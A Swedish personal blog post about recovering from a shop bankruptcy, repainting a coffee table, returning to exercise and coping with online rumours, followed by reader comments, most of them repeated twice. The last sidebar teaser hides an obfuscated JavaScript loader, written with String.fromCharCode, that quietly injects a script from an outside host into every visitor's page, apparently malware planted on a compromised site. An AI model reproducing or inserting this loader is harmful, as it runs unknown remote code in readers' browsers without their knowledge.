Dags att vända blad, se framåt. Slicka såren och resa mig stark! -Starkare än någonsin!

FullSizeRenderHej fina du! Efter konkursen har känslorna svallat upp och ner som en bergodalbana. Livet har varit KAOS!!!

Jag försöker ”landa” hitta en vardag och bara vara. INTE min starka sida. Men det går framåt. Ett av mina projekt var att tillsammans med Lilleman måla, slipa och fixa med vårt soffbord. Terapi arbete på hög nivå, som samtidigt var riktigt kul! Jag har ju helt glömt bort att lägga upp före och efter bilder.

 Här kommer resultatet! Jag är SÅ nöjd! Både med resultatet, men framförallt med att jag känner mig lite ”huslig” som gjort något kreativt hemma. (det händer normalt sett inteFullSizeRenderNågon mer än jag som är liiite trött på ek? Jag är SÅ trött på ek!

Jag kände att andrahands värdet på ett borde som när jag köpte det, kostade ca 3700:- och nu knappt är värt mer än några hundralappar. Så istället för att krångla med an annons, och föröka sälja bordet, behöva anpassa mig till en tid när det ska hämtas upp, OCH behöva köpa ett nytt bord.. Så gjorde jag såhär istället! Billigare, snyggare och mer personligt! =) -Bra kombo!

Färgen jag använde heter -Celadon Primo.Du hittar den HÄR OLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAMin kära lilla ”konkurs kaktus” får självklar stå mitt på bordet. En påminnelse och en reminder om det som varit och vart jag vill ta mig i framtiden. OLYMPUS DIGITAL CAMERAFullSizeRenderKalklitir färg och penslar hittar du HÄR . Lätta att använda och ger den där ”slitna” ytan som jag är ute efter.PÅ bilden ovan ser du en annan färg som jag också tycker om. 

Nu när bordet blev så bra, så ska vi ge oss på tv skänken också. Väntar på att det ska sluta regna så vi kan bära ut det och måla och slipa det utomhus……. Jag har LOVAT Lilleman att han ska få vara med, såklart! =)

Idag har jag suttit hemma vid dator nästan hela dagen. Jobbar med ett resereportage som ska lämnas in till tidning. Jobbar även på nästa nr av Hälsa & Fitness, på min Trendspaning. Alltså det kommer SÅ mycket kul nu inför hösten. Alla som varit iväg på semester och varit off, under en längre period kommer  tillbaka nu… med en massa ny energi, nya projekt och nya kollektioner! Hösten kommer att bli grym! PÅ många sätt. Nu har vi precis kommit tillbaka från gymmet. Lilleman fick följa med och vara på Mini SATS. Han älskar mini SATS. Perfekt för honom att få träffa lite nya kompisar, vara social och busa av sig en timme medans jag tränar. Jag tränar med gott samvete när jag vet hur roligt han tycker att det är! =)  

Alltså det här med fransar, smink och grejer! Hmpf, jag har lixom inte orkat att ”ta hand om mig själv” såhär ser jag ut med svett som rinner i pannan, och inte en frans så långt ögat kan nå! Men du, GRYM känsla efter träning! Det ger mig så mycket bra energier. Energier som jag behöver just nu…. IMG_8336 FullSizeRender

Måste dock erkänna att det var lite svår startat för mig idag. benen är tunga efter mitt pass i förrgår. Jag har träningsvärk!

 Jag har haft ett uppehåll på många veckor nu. DET är inte min kropp van vid. Jag känner att det viktigaste för mig nu är att få struktur och sakta men säkert börja bygga upp min vardag igen….. Träningen och kosten har varit katastrofalt dålig! Nu ska jag boosta mig med energi, och vitaminer för att orka. För att komma tillbaka. Jag är trött på negativitet, spekulationer, och allt skit som snurrar på nätet just nu. Jag vill vända blad. Gå vidare. Ett av tusentals exempel just nu. AIDS?! 

image

Ja du, ska man skratta eller gråta? Vad hade DU gjort? Hur hade du hanterat näthat, påståenden och ryktesspridning från nättroll? Sex-listor, spekulationer, och nu AIDS. Hat föder hat. Vi lämnar det där.

Precis som jag skrev innan, Spekulationer likt dessa är något jag vant mig vid och jag ser de snarare som ett bevis på att jag gör något rätt när människor inte hittar annat att skriva om än just påhitt…. Jag får skit för kommentarer jag inte publicerar. jag får skit för kommentarer jag publicerar. Svarar jag INTE på frågor, får jag skit för det. Svarar jag på frågor så ”borde jag hållt det för mig själv” osv. Jag kommer aldrig att kunna vara alla till lags, det går inte. Så jag får helt enkelt bara förlika mig med det och låta det vara så.

-Du förstår förhoppningsvis problematiken här???

Jag känner att min energi måste ligga på mig själv. HUR egoistiskt det kanske låter för i dina ögon så är det så det måste det bli. Jag har precis kommit igång med träningen igen. Nu ska kosten läggas om. Inte någon diet eller något annat kortsiktigt.

Långsiktiga förändringar som ska bygga upp mig inifrån och ut. Nu vill jag hitta tillbaka till ”den gamla My” Den glada, positiva energi spridaren som peppar, inspirerar och uppmuntrar mina läsare, och folk som väljer att följa mig….. <3 För det ska DU veta, du betyder JÄTTE yrket för mig! Tveka aldrig på det! 

Självklart kommer jag att ha mina ”down” perioder, där jag faller tillbaka i mitt svarta hål. Men med tiden ska dom fallen bli mer sällan, och tillslut försvinna helt. Jag har tagit hjälp. Jag pratat med en psykolog. Jag är inte mer än människa. Jag är sårad, besviken och trött efter allt som har hänt. Butiken tog mig hårt, jag oroar mig fortfarande av vad slutresultatet ska bli och hur det kommer att påverka min framtid. Konkursen är inte avslutat ännu.

Men jag tar emot hjälp, jag tillåter mig att vara ledsen ibland. För att seden kunna gå stark ur detta. Starkas än NÅGONSIN. Du som vill, kommer att få följa min resa. Min väg tillbaka….. Jag står för vem jag är. Jag är den jag är, med både fel och brister! Nu ska jag lära mig av mina misstag, slicka såren och resa mig upp! 

Imorgon är ”det” äntligen officiellt. Det där beslutet jag nämnt för dig….  Imorgon ska jag berätta vad som ligger närmast i mina framtidsplaner. En dröm som går i uppfyllelse!  Jag är så sjukt taggad och glad för detta! Kan knappt hålla mig med att berätta!!!

 Varma kramar / My Martens

PS Missa INTE den pågående utförsäljningen hos Kids Brand Store.SE    –> –> HÄR <– <– IMG_8207

 

110 Komentarer

 1. Usch o fy vad trist med elakt skvaller. Låt inte det knäcka dig bara. Du är stark som få ! Och det är säkert det som retar folk. Hade jag varit dig, så hade jag blockat dom rent elaka kommentarerna. Du väljer ju definitivt inte ut kommentarer som bara är positiva om dig, som någon har skrivit.
  Kanon att du tränar ! Det gör susen för kropp o själ. kram

 2. Skriv vad som verkligen hänt och då menar jag hela sanningen…
  Sedan vänder du blad My, och lämnar det bakom dig helt och hållet, alltså citera inte vad för ”skit” folk skriver på Flashback Forum…läs inte där alls!
  Älta inte, hur sårad du än är ? Move on ? Kram

  • Tungan hänger utanför ….. Slurp! Vad har hänt? Flåsar ähähähäh ….. Vända blad? Flås igen… Kungen sa ju de? Flås igen äho äho orkar inte tatata… Tungan g år i golvet…. Kun..g.. Sa ju d……. Och DÄr dog, vem ? Puss o kram ! ?

  • Hej Madeleine! Tack, du har rätt. Jag ska inte läsa där als. Men jag får väldig mycket skickat till mig, även när jag inte själv går inte och läser… i olika forum. Folk, människor, troll och spekulanter får säga precis vad dom vill…. Folk får säga precis vad dom vill. Jag VET vad som är sant och inte. Det räcker för mig. sanningen kommer ALLTID fram ? -Det ser JAG fram emot! kram <3

   • Ser du fram imot att sanningen kommer fram och du genast av den så är det extremt konstigt att du inte berättar anningen själv, njaa

    • Sophia, varför ska jag lägga energi på att försvara mig, dag ut och dag in? Jag har ingen aning om vad jag är anklagad för, och allt som cirkulerar på nätet ifrån dessa troll… Jag menar rent generellt att sanningen kommer alltid fram. DET ser jag fram emot, så slipper jag detta eviga tjat och alla anklagelser som är låååååångt utanför min kontroll. ?

 3. Hej Fina My!
  Läser din blogg varje dag, älskar den! Åh va jätte fint bordet blev. Härligt att du kommit i gång m träningen igen, det skulle jag verkligen behöva nu efter mina 5 v semester..
  Man har bara ätit å druckit gott nästan hela tiden, men har man semester så har man haha.. Lycka till med det nya du har på gång, spännande.
  Kramar Malin B

   • För regelbunden kostintag börjas med att man ska försöka kliva upp i samma tid annars hamnar man direkt efter med tiderna och därmed senare måltider. Man ska inte försöka äta på kvällen då behöver magen ro och vila. Är du en sådan person som får lätt sötsug mellan måltiderna se då till att ha ett enkelt och hälsosamt mellanmål , hemma eller i väskan. Ser du börjat med smoothies, jätte bra! Annars nyttiga nötter kan även funka, spenat och frukt som inte innehåller så mkt fruktsocker. Fisk för middag eller lunch är ett viktigt intag flera gånger i veckan. Skriva om du vill ha tips på något med fisk. Ta bort all vitpasta och byt ut mot fullkorn även ris. Även glutenfria alternativ kan vara bra för magen om du blir lätt uppsvullen. Den störta delen av tallriken ska bestå utav grönsaker ☺ Vet du har svårt för de. Men försök med massa olika. De finns många nyttiga och goda maträtter ☺

 4. Håller med Madeleine ngt har hänt ! I kompiskretsen ! Vänd sen blad o vi följer med , du skriver bra o är inspiration ! Må så gott My

  • Oavsett vad som hänt är det bäst att vara ärlig. Även om det kommer lugna ner sig med ryktespridningen med tiden så kommer någon gång nån av alla inblandade att prata vid sidan av och sanningen kommer fram. Sanningen sett ur just den personens perspektiv. Bättre då att vara den första som tar bladet ur mun och säger sin sanning.

   • Folk, människor, troll och spekulanter får säga precis vad dom vill…. Folk får säga precis vad dom vill. Jag VET vad som är sant och inte. Det ocker för mig. Precis som du skriver, sanningen kommer ALLTID fram ? -Det ser JAG fram emot!

 5. Usch o fy vad trist med elakt skvaller. Låt inte det knäcka dig bara. Du är stark som få ! Och det är säkert det som retar folk. Hade jag varit dig, så hade jag blockat dom rent elaka kommentarerna. Du väljer ju definitivt inte ut kommentarer som bara är positiva om dig, som någon har skrivit.
  Kanon att du tränar ! Det gör susen för kropp o själ. kram

 6. Hejsan
  Det är ju inget att byt sig över, lägg inte energi på dessa saker.
  Du vet vad som är rätt.
  Det finns ett ända ord , det är svensk avundsjuka.
  Du är så bra och världens bästa mamma så bara njut.
  Ditt liv kommer säkert bli toppen bra.
  Lycka till

 7. Skriv vad som verkligen hänt och då menar jag hela sanningen…

  Sedan vänder du blad My, och lämnar det bakom dig helt och hållet, alltså citera inte vad för ”skit” folk skriver på Flashback Forum…läs inte där alls!

  Älta inte, hur sårad du än är 🌹 Move on 💕 Kram

  • Tungan hänger utanför ….. Slurp! Vad har hänt? Flåsar ähähähäh ….. Vända blad? Flås igen… Kungen sa ju de? Flås igen äho äho orkar inte tatata… Tungan g år i golvet…. Kun..g.. Sa ju d……. Och DÄr dog, vem ? Puss o kram ! 🙂

  • Hej Madeleine! Tack, du har rätt. Jag ska inte läsa där als. Men jag får väldig mycket skickat till mig, även när jag inte själv går inte och läser… i olika forum. Folk, människor, troll och spekulanter får säga precis vad dom vill…. Folk får säga precis vad dom vill. Jag VET vad som är sant och inte. Det räcker för mig. sanningen kommer ALLTID fram 😉 -Det ser JAG fram emot! kram <3

   • Ser du fram imot att sanningen kommer fram och du genast av den så är det extremt konstigt att du inte berättar anningen själv, njaa

    • Sophia, varför ska jag lägga energi på att försvara mig, dag ut och dag in? Jag har ingen aning om vad jag är anklagad för, och allt som cirkulerar på nätet ifrån dessa troll… Jag menar rent generellt att sanningen kommer alltid fram. DET ser jag fram emot, så slipper jag detta eviga tjat och alla anklagelser som är låååååångt utanför min kontroll. 🙂

 8. Hej Fina My!
  Läser din blogg varje dag, älskar den! Åh va jätte fint bordet blev. Härligt att du kommit i gång m träningen igen, det skulle jag verkligen behöva nu efter mina 5 v semester..
  Man har bara ätit å druckit gott nästan hela tiden, men har man semester så har man haha.. Lycka till med det nya du har på gång, spännande.
  Kramar Malin B

   • För regelbunden kostintag börjas med att man ska försöka kliva upp i samma tid annars hamnar man direkt efter med tiderna och därmed senare måltider. Man ska inte försöka äta på kvällen då behöver magen ro och vila. Är du en sådan person som får lätt sötsug mellan måltiderna se då till att ha ett enkelt och hälsosamt mellanmål , hemma eller i väskan. Ser du börjat med smoothies, jätte bra! Annars nyttiga nötter kan även funka, spenat och frukt som inte innehåller så mkt fruktsocker. Fisk för middag eller lunch är ett viktigt intag flera gånger i veckan. Skriva om du vill ha tips på något med fisk. Ta bort all vitpasta och byt ut mot fullkorn även ris. Även glutenfria alternativ kan vara bra för magen om du blir lätt uppsvullen. Den störta delen av tallriken ska bestå utav grönsaker ☺ Vet du har svårt för de. Men försök med massa olika. De finns många nyttiga och goda maträtter ☺

 9. Håller med Madeleine ngt har hänt ! I kompiskretsen ! Vänd sen blad o vi följer med , du skriver bra o är inspiration ! Må så gott My

  • Oavsett vad som hänt är det bäst att vara ärlig. Även om det kommer lugna ner sig med ryktespridningen med tiden så kommer någon gång nån av alla inblandade att prata vid sidan av och sanningen kommer fram. Sanningen sett ur just den personens perspektiv. Bättre då att vara den första som tar bladet ur mun och säger sin sanning.

   • Folk, människor, troll och spekulanter får säga precis vad dom vill…. Folk får säga precis vad dom vill. Jag VET vad som är sant och inte. Det ocker för mig. Precis som du skriver, sanningen kommer ALLTID fram 😉 -Det ser JAG fram emot!

 10. En del är bara för mkt, du är toppen som orkar stå på benen. Snyggt bord och My, du ser bra ut även utan fransförlängning ?

 11. Hejsan
  Det är ju inget att byt sig över, lägg inte energi på dessa saker.
  Du vet vad som är rätt.
  Det finns ett ända ord , det är svensk avundsjuka.
  Du är så bra och världens bästa mamma så bara njut.
  Ditt liv kommer säkert bli toppen bra.
  Lycka till

 12. Man häpnar av vad människor skriver! Till vilken nytta! Bra My att du vänder blad, lägger det åt sidan. Du är stark! Läser din blogg varje dag och du är fantastisk My! Du har din fina familj, Ludvig och Tezz! Ta hand om er!
  Många kramar till er

 13. Hej My! Stå på dig du vet vad som du gjort om du har gjort något. Tror att det hela handlar om en enda stor avundsjuka. Du är ung och vacker mot en del av dina snart 40-50 åriga vänner nämner inga namn. Det kommer upp så småningom. men My du är bäst skit i alla andra

 14. Härligt My! Vänd nu blad och blicka fram! Du är en sann entreprenör, driven, erfaren (trots din låga ålder), duktig OCH snygg! Talets förmåga och stor social kompetens. Finns det någon i din genre som gjort så mycket som du INNAN deras 30-årsdag? Byggt upp företag som du, flera företag rättare sagt, pendlat till Holland och köpt in blommor, rattat personal (vilket inte är det lättaste) och stor fastighet och dessutom fött barn och levt ensamstående?! Vilken livserfarenhet och kunskap i så ung ålder! Konkurs, ja visst men det är jag säker på på yttre faktorer som hårdare konkurrens osv. Och folk frågar efter sanningen och skickar utdrag från flashback…. ja vad ska man säga… finns det någon in din genre som det inte står smaskigheter om på flashback??? Eller som det snackas bakom rygg på, sant eller osant… ingen aning men rykten och baktalande sanna eller osanna råkar nog ni alla ut för. Jag vet inte vad det är för sanning de vill ha fram men är helt säker på att det i så fall finns sanningar om bra många fler som ej kommit fram ännu. Så som sagt, vänd blad! Pussokram

 15. Hejsan My,
  Du känner inte mig och jag känner inte dig heller. Men, jag fastnade i din blogg igår och delar av idag, den dök upp bara som en reklamflash eller något så jag klickade mig in och blev helt fast. Vilken livshistoria. Helt sanslöst stark verkar du vara. Läste dock bara så långt bak i tiden som precis innan konkursen och fram till idag (sen gick mitt jobb-samvete in och sa åt mig att arbeta ?
  Ville egentligen bara skicka en vänlig hälsning och säga att jag tycker att du har gjort ett grymt jobb och att jag är sjukt imponerad över hur hårt du jobbade för att få bort alla leverantörsskulder, heder åt dig! Att i de senaste inläggen se glädje i dina ögon känns ju så underbart med tanke på allt du har gått igenom. Härligt att din son har lärt sig simma, härligt att du har så fina vänner, härligt att din ångest verkar dämpa sig (panikångest fick jag själv för två år sedan på grund av arbetsrelaterad stress och delvis utmattning av för stor press, vet hur det känns, det är vidrigt!)
  Håller verkligen tummarna för att det nu äntligen kan få vara din tur att vara totalt lycklig med bra jobb, stabil ekonomi och en harmoni i livet.
  (Shit vad klyschigt det lät då….. men ändå, du förstår säkert vad jag menar)
  Lycka till nu och all styrka

 16. Hej My!!
  Bordet blev verkligen supersnyggt. Duktig du är. Skulle själv vilja göra om Så mkt men inspirationen tar liksom slut innan jag ens börjat. Hmm.
  Kram kram på dig och all styrka till dig. Du är stark.

 17. En del är bara för mkt, du är toppen som orkar stå på benen. Snyggt bord och My, du ser bra ut även utan fransförlängning 👍

 18. Hej My! Jag äger också ett ganska originellt soffbord i ek (tror jag) format som ett löv,
  nu börjar det se lite lätt härjat ut efter ca: 9 år, barn, etc. Vågar jag mig på att måla om ?
  Visa mig på bild hur ditt resultat blev efteråt, Tack. Så får vi se om jag också vågar, ha det gött kära My!

 19. Snyggt bordet blev!! Älskar pyssel och förändring i hemmet men jag har varit för trött denna semester pga min gräsallergi för att orka! Lusten kommer iaf tillbaka i september det vet jag alldeles säkert. ?
  Stöttar dig här från Småland. <3
  Kram Sofia

 20. Man häpnar av vad människor skriver! Till vilken nytta! Bra My att du vänder blad, lägger det åt sidan. Du är stark! Läser din blogg varje dag och du är fantastisk My! Du har din fina familj, Ludvig och Tezz! Ta hand om er!
  Många kramar till er

 21. Hej My! Stå på dig du vet vad som du gjort om du har gjort något. Tror att det hela handlar om en enda stor avundsjuka. Du är ung och vacker mot en del av dina snart 40-50 åriga vänner nämner inga namn. Det kommer upp så småningom. men My du är bäst skit i alla andra

 22. Det är ju definitivt ingen frisk person som skrivit det där,(kommentaren om AIDS) Tycker synd om stackarn som måste skriva på det viset…nej man vet faktiskt inte om man ska skratta eller gråta ?

 23. Härligt My! Vänd nu blad och blicka fram! Du är en sann entreprenör, driven, erfaren (trots din låga ålder), duktig OCH snygg! Talets förmåga och stor social kompetens. Finns det någon i din genre som gjort så mycket som du INNAN deras 30-årsdag? Byggt upp företag som du, flera företag rättare sagt, pendlat till Holland och köpt in blommor, rattat personal (vilket inte är det lättaste) och stor fastighet och dessutom fött barn och levt ensamstående?! Vilken livserfarenhet och kunskap i så ung ålder! Konkurs, ja visst men det är jag säker på på yttre faktorer som hårdare konkurrens osv. Och folk frågar efter sanningen och skickar utdrag från flashback…. ja vad ska man säga… finns det någon in din genre som det inte står smaskigheter om på flashback??? Eller som det snackas bakom rygg på, sant eller osant… ingen aning men rykten och baktalande sanna eller osanna råkar nog ni alla ut för. Jag vet inte vad det är för sanning de vill ha fram men är helt säker på att det i så fall finns sanningar om bra många fler som ej kommit fram ännu. Så som sagt, vänd blad! Pussokram

 24. Hejsan My,

  Du känner inte mig och jag känner inte dig heller. Men, jag fastnade i din blogg igår och delar av idag, den dök upp bara som en reklamflash eller något så jag klickade mig in och blev helt fast. Vilken livshistoria. Helt sanslöst stark verkar du vara. Läste dock bara så långt bak i tiden som precis innan konkursen och fram till idag (sen gick mitt jobb-samvete in och sa åt mig att arbeta 😉

  Ville egentligen bara skicka en vänlig hälsning och säga att jag tycker att du har gjort ett grymt jobb och att jag är sjukt imponerad över hur hårt du jobbade för att få bort alla leverantörsskulder, heder åt dig! Att i de senaste inläggen se glädje i dina ögon känns ju så underbart med tanke på allt du har gått igenom. Härligt att din son har lärt sig simma, härligt att du har så fina vänner, härligt att din ångest verkar dämpa sig (panikångest fick jag själv för två år sedan på grund av arbetsrelaterad stress och delvis utmattning av för stor press, vet hur det känns, det är vidrigt!)

  Håller verkligen tummarna för att det nu äntligen kan få vara din tur att vara totalt lycklig med bra jobb, stabil ekonomi och en harmoni i livet.
  (Shit vad klyschigt det lät då….. men ändå, du förstår säkert vad jag menar)

  Lycka till nu och all styrka

 25. Hej My!!
  Bordet blev verkligen supersnyggt. Duktig du är. Skulle själv vilja göra om Så mkt men inspirationen tar liksom slut innan jag ens börjat. Hmm.
  Kram kram på dig och all styrka till dig. Du är stark.

 26. Hej My! Jag äger också ett ganska originellt soffbord i ek (tror jag) format som ett löv,
  nu börjar det se lite lätt härjat ut efter ca: 9 år, barn, etc. Vågar jag mig på att måla om ?
  Visa mig på bild hur ditt resultat blev efteråt, Tack. Så får vi se om jag också vågar, ha det gött kära My!

 27. Snyggt bordet blev!! Älskar pyssel och förändring i hemmet men jag har varit för trött denna semester pga min gräsallergi för att orka! Lusten kommer iaf tillbaka i september det vet jag alldeles säkert. 🙂

  Stöttar dig här från Småland. <3

  Kram Sofia

 28. Det är ju definitivt ingen frisk person som skrivit det där,(kommentaren om AIDS) Tycker synd om stackarn som måste skriva på det viset…nej man vet faktiskt inte om man ska skratta eller gråta 🙂

 29. Trist och hemskt med hittepå-skvaller och dumt förutfattade meningar… De måste vara en person som har sjuka problem med sin egen person.
  Diggar din blogg! Läser den numera dagligen då jag skaffat eget konto/blogg. Du har en skön stil, en förebild ?
  Kör på bara och kör över dem! Kram

 30. Trist och hemskt med hittepå-skvaller och dumt förutfattade meningar… De måste vara en person som har sjuka problem med sin egen person.

  Diggar din blogg! Läser den numera dagligen då jag skaffat eget konto/blogg. Du har en skön stil, en förebild 🙂

  Kör på bara och kör över dem! Kram

 31. Vill bara säga att du är en fantastisk person My och en riktig kämpe <3 Beundrar allt du klarar och har gått igenom. Vacker både på in- och utsidan. Var rädd om dig och lycka till med allt. Du behöver inga fransar så fin ändå. Har själv varit sugen på fransar så många gånger men är rädd att tappa mina egna och då ser det ju hemskt ut om man inte fortsätter. Har du varit med om det nån gång? Ha det så bra med din fina son Kraaaam

 32. Vill bara säga att du är en fantastisk person My och en riktig kämpe <3 Beundrar allt du klarar och har gått igenom. Vacker både på in- och utsidan. Var rädd om dig och lycka till med allt. Du behöver inga fransar så fin ändå. Har själv varit sugen på fransar så många gånger men är rädd att tappa mina egna och då ser det ju hemskt ut om man inte fortsätter. Har du varit med om det nån gång? Ha det så bra med din fina son Kraaaam

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/